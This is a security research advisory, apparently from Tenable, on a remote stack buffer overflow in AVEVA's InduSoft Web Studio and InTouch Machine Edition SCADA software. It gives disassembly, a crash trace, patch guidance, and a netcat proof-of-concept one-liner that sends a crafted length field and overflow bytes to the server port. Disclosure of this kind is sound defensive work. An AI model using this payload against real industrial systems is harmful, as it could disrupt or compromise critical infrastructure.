A new critical remote code execution vulnerability in AVEVA’s Indusoft Web Studio and InTouch Machine Edition can be exploited to compromise sensitive operational technology. AVEVA has released a patch and we advise urgent attention and response from affected end users.
Tenable Research discovered a new critical remote code execution (RCE) vulnerability in AVEVA’s Indusoft Web Studio and InTouch Machine Edition. The applications contain a stack buffer overflow that can be exploited to execute arbitrary code on target systems.
These products were previously marketed under the Schneider Electric brand and are now being managed by AVEVA.
What do you need to know? Tenable Research discovered a new critical remote code execution vulnerability in AVEVA’s Indusoft Web Studio and InTouch Machine Edition.
What's the attack vector? The vulnerability can be remotely exploited without authentication to execute arbitrary commands on the target system.
What's the business impact? A malicious threat actor can completely compromise and gain control of the system, and use it as a pivot point to execute lateral transfer.
What's the solution? AVEVA has released InduSoft Web Studio Hotfix 81.1.00.08 and InTouch Machine Edition Hotfix 81.1.00.08 to address this vulnerability. Affected users should urgently apply the patches.
Background
InduSoft Web Studio is a suite of tools providing automation building blocks which are used to develop human-machine interfaces (HMIs), Supervisory Control and Data Acquisition (SCADA) systems and embedded instrumentation solutions.
InTouch Machine Edition is an HMI/SCADA software toolset used to develop applications that connect automation systems and interfaces for web browsers, smartphones and tablets.
Diverse industries -- including agriculture, transportation, energy, nuclear power, manufacturing, entertainment and physical security -- use SCADA in conjunction with operational technology (OT). Because of their critical role in modern infrastructure and the wide range of industries that deploy them, SCADA systems have become a primary security concern and are increasingly being targeted by threat actors.
Analysis
Tenable Research found a new stack overflow vulnerability in TCPServer.dll. The vulnerability is in the code to read a 'string' from the received network data. This vulnerability is similar to the one we disclosed in May 2018, but is triggered through command 81 instead of command 50.
Here’s a description of two data structures in TCPServer.dll to help you understand the vulnerability.
- The following object (referred here as 'WSTR') is used to store a wide-character string:
- Another object heavily used in TCPServer.dll is the 'TcpServerThreadBuffer' (referred to here as CBuf). This object is used to store, process and manipulate network data received from clients.
Class WSTR { vftable; unsigned short lbuf[0x40]; // local storage for the string data void *pData; // ptr to string data; can point to @lbuf int32 DataLen; // length allocated for @pData ... };
When the string can fit in lbuf, it should be stored there. Otherwise, heap memory is allocated to store the string.
Class CBuf { vftable; int32 AllocSize; // used for allocation, seen: 0x4000 int32 CurPos; // current position int32 BufSize; // allocated size of @pBuffer void *pBuffer; // buffer holding network data; can point to @lbuf byte lbuf[0x100]; // local storage for network data ... };
Inside the virtual function table, there are many functions used to read and write various types of command parameters (i.e., byte, boolean, short, int32 and string).
The vulnerability can be triggered via command 81:
[...] .text:5D43D8B8 xor eax, eax .text:5D43D8BA mov [ebp+var_wstr.vftable], offset off_5D4CAD5C .text:5D43D8C4 mov word ptr [ebp+var_wstr.lbuf], ax ; wstr.lbuf[0] = '\0'; .text:5D43D8CB mov [ebp+var_wstr.pData], eax ; wstr.pData = NULL; .text:5D43D8D1 mov [ebp+var_wstr.DataLen], eax ; wstr.DataLen = 0; .text:5D43D8D7 lea ecx, [ebp+var_wstr]; a wstr object on the stack .text:5D43D8DD mov [ebp+var_4], eax .text:5D43D8E0 mov eax, [edi] .text:5D43D8E2 push ecx .text:5D43D8E3 mov ecx, edi .text:5D43D8E5 call [eax+vftCBuf.Cbuf_ReadString] ; Cbuf_ReadString [...]
Here, the code tries to read a 'string' object from the network data into a WSTR object (which is on the stack). This means wstr.lbuf is a buffer on the stack.
Inside Cbuf_ReadString(), the length of the 'string' object is read, and the function tries to allocate str_len + 1 to store the string:
[...] .text:5D40C05D call Cbuf_ReadStringLength ; return 1, 2, or 4 byte(s) .text:5D40C062 mov esi, [ebp+arg_sbuf] .text:5D40C065 mov edi, eax ; attacker specifies length 0xffffffff .text:5D40C067 mov ecx, esi .text:5D40C069 lea edx, [edi+1] ; length wraps to 0 if 0xffffffff .text:5D40C06C push edx .text:5D40C06D call wstr_alloc [...]
If the attacker specifies 0xFFFFFFFF as the string length, alloc size of 0 is passed to wstr_alloc(), which increments the size by one and checks if the size can fit in the local buffer (wstr.lbuf). Since 1 (0 + 1) is less than 0x40 (countof(wstr.lbuf)), the function returns 1 without allocating heap memory, asssuming wstr.lbuf is big enough to store the string:
[...] .text:5D40BDD4 mov edx, [ebp+arg_size] .text:5D40BDD7 inc edx ; size++ .text:5D40BDD8 push edi .text:5D40BDD9 mov edi, ecx .text:5D40BDDB mov [ebp+arg_size], edx .text:5D40BDDE cmp edx, 40h .text:5D40BDE1 jge short loc_5D40BDEF .text:5D40BDE3 mov eax, 1 [...]
Then Cbuf_ReadString() calls a Cbuf method to read in the string data, telling it the stack buffer has 0xffffffff bytes
[...] .text:5D40C09C push edi ; 0xffffffff .text:5D40C09D push ecx ; stack buf .text:5D40C09E mov ecx, ebx .text:5D40C0A0 call [eax+vftCBuf.ReadAndConvertToWchars] ; stack overflow! [...]
which can cause a stack buffer overflow:
STATUS_STACK_BUFFER_OVERRUN encountered (9e8.b28): Break instruction exception - code 80000003 (first chance) eax=00000000 ebx=5d15b708 ecx=766ce4b4 edx=0e76efb9 esi=00000000 edi=00ec2870 eip=766ce331 esp=0e76f200 ebp=0e76f27c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 kernel32!UnhandledExceptionFilter+0x5f: 766ce331 cc int 3 0:020> kb # ChildEBP RetAddr Args to Child 00 0e76f27c 694c00f1 5d15b708 0e76f298 5d133403 kernel32!UnhandledExceptionFilter+0x5f *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\InduSoft Web Studio v8.1\Bin\TCPSERVER.DLL - 01 0e76f288 5d133403 5d15b708 00000001 0e76f5c8 MSVCR110!__crtUnhandledException+0x14 WARNING: Stack unwind information not available. Following frames may be wrong. 02 0e76f298 5d13351a 5d15b708 00000010 00000044 TCPSERVER!_StudioSetLanguage__+0x1653 03 0e76f5c8 5d0bdbff 049ecae8 049ecb18 049ecb18 TCPSERVER!_StudioSetLanguage__+0x176a 04 0e76f7ec 00410041 00410041 00410041 00410041 TCPSERVER+0x3dbff 05 0e76f7f0 00410041 00410041 00410041 00410041 0x410041 06 0e76f7f4 00410041 00410041 00410041 00410041 0x410041 07 0e76f7f8 00410041 00410041 00410041 00410041 0x410041 [...]
Proof of Concept (PoC)
Below is the PoC to trigger the stack buffer overflow:
cat < (echo -ne '\x02\x31\x10\x31\x10\x38\x10\x32\x10\x32\x03\x02\x51\xff\xff\xff\xff\xff\xff\xff'`python -c "print 'A'*1000"`'\x03') - | nc <target_host> 1234
Business impact
These vulnerabilities leave InduSoft Web Studio or InTouch Machine Edition server machines vulnerable to an unauthenticated remote attacker who could leverage them to execute arbitrary code, potentially leading to full system compromise. In turn, these machines could allow an attacker to move laterally within a network. Connected HMI clients and OT devices can also be exposed to attacks.
AVEVA and Tenable consider this a critical vulnerability requiring urgent attention and response from affected end users.
Solution
AVEVA has released updates InduSoft Web Studio Hotfix 81.1.00.08 and InTouch Machine Edition Hotfix 81.1.00.08 to remediate this vulnerability. Update the application by applying the appropriate patches:
- If you’re using InduSoft Web Studio v8.1 SP1 or prior versions, you should upgrade and apply InduSoft Web Studio Hotfix 81.1.00.08 as soon as possible.
- If you’re using InTouch Machine Edition 2017 v8.1 SP1 or prior versions, you should upgrade and apply InTouch Machine Edition Hotfix 81.1.00.08 as soon as possible.
Additional information
- AVEVA Security Bulletin
- Tenable Research Advisory
- May 2018 Tenable Research Advisory for Schneider Electric InduSoft Web Studio and InTouch Machine Edition Remote Code Execution
- Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface
- Get a free 60-day trial of Tenable.io Vulnerability Management